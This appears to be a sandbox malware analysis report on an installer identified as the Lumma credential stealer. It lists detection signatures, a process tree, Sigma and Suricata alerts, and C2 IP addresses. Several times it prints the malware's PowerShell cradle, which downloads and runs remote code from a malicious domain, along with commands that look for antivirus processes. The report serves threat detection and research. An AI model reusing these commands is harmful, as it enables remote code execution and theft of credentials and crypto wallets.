Edit tour

Windows Analysis Report
installer_1.05_36.5.exe

Overview

General Information

Sample name:	installer_1.05_36.5.exe
Analysis ID:	1582048
MD5:	8850838982a2e4f34598328ed33a3cda
SHA1:	1c36e904ea837c571ff55e19a58a1d30f25858d2
SHA256:	fb95fc66166b36ecf9f23bb34b29965e92827c16fe51ca69cc5389eb3898b2e3
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Drops PE files with a suspicious file extension

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

installer_1.05_36.5.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\installer_1.05_36.5.exe" MD5: 8850838982A2E4F34598328ED33A3CDA)

cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c move Counts Counts.cmd & Counts.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7540 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7556 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7584 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7592 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7628 cmdline: cmd /c md 373155 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7648 cmdline: extrac32 /Y /E French MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7668 cmdline: findstr /V "rangers" Tender MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7680 cmdline: cmd /c copy /b 373155\Pens.com + Limited + Guardian + Stationery + Checklist + Draft + Acids + Norway + Cord + Within + N + Nv 373155\Pens.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7700 cmdline: cmd /c copy /b ..\Comparing + ..\Void + ..\Hobby + ..\Death + ..\You + ..\Happen + ..\Fusion a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Pens.com (PID: 7716 cmdline: Pens.com a MD5: 62D09F076E6E0240548C2F837536A46A)

powershell.exe (PID: 8188 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe (PID: 4364 cmdline: "C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)

E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp (PID: 736 cmdline: "C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp" /SL5="$60456,7785838,845824,C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)

E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe (PID: 7016 cmdline: "C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)

E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp (PID: 7468 cmdline: "C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp" /SL5="$70456,7785838,845824,C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)

timeout.exe (PID: 7604 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7704 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7748 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7504 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 7464 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3852 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 5164 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 2840 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4420 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 5312 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 3872 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 420 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 1832 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 1272 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8012 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7984 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 5104 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5956 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 2492 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

BrightLib.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)

choice.exe (PID: 7740 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Pens.com a, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com, ParentProcessId: 7716, ParentProcessName: Pens.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 8188, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Pens.com a, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com, ParentProcessId: 7716, ParentProcessName: Pens.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 8188, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Pens.com a, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com, ParentProcessId: 7716, ParentProcessName: Pens.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 8188, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Pens.com a, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com, ParentProcessId: 7716, ParentProcessName: Pens.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 8188, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Pens.com a, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com, ParentProcessId: 7716, ParentProcessName: Pens.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 8188, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Counts Counts.cmd & Counts.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7592, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T17:55:38.948345+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.42.198	443	TCP
2024-12-29T17:55:40.963513+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.42.198	443	TCP
2024-12-29T17:55:43.374711+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.42.198	443	TCP
2024-12-29T17:55:45.852970+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.42.198	443	TCP
2024-12-29T17:55:48.136218+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.42.198	443	TCP
2024-12-29T17:55:52.495246+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.42.198	443	TCP
2024-12-29T17:55:54.556039+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.42.198	443	TCP
2024-12-29T17:55:56.632161+0100	2028371	3	Unknown Traffic	192.168.2.4	49746	104.21.42.198	443	TCP
2024-12-29T17:55:59.388228+0100	2028371	3	Unknown Traffic	192.168.2.4	49752	185.161.251.21	443	TCP
2024-12-29T17:56:01.600124+0100	2028371	3	Unknown Traffic	192.168.2.4	49758	172.67.208.58	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T17:55:39.696416+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.42.198	443	TCP
2024-12-29T17:55:41.772441+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	104.21.42.198	443	TCP
2024-12-29T17:55:57.419655+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49746	104.21.42.198	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T17:55:39.696416+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49737	104.21.42.198	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T17:55:41.772441+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49738	104.21.42.198	443	TCP

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T17:56:02.622402+0100	2008438	1	A Network Trojan was detected	172.67.208.58	443	192.168.2.4	49758	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T17:55:53.302085+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49742	104.21.42.198	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://klipvumisui.shop/int_clp_sha.txt

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe

ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Source: installer_1.05_36.5.exe

Virustotal: Detection: 11%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.1% probability

Source: installer_1.05_36.5.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49758 version: TLS 1.2

Source: installer_1.05_36.5.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbQ@ source: powershell.exe, 00000011.00000002.2315065218.0000000003421000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbd source: powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2322404249.0000000007704000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

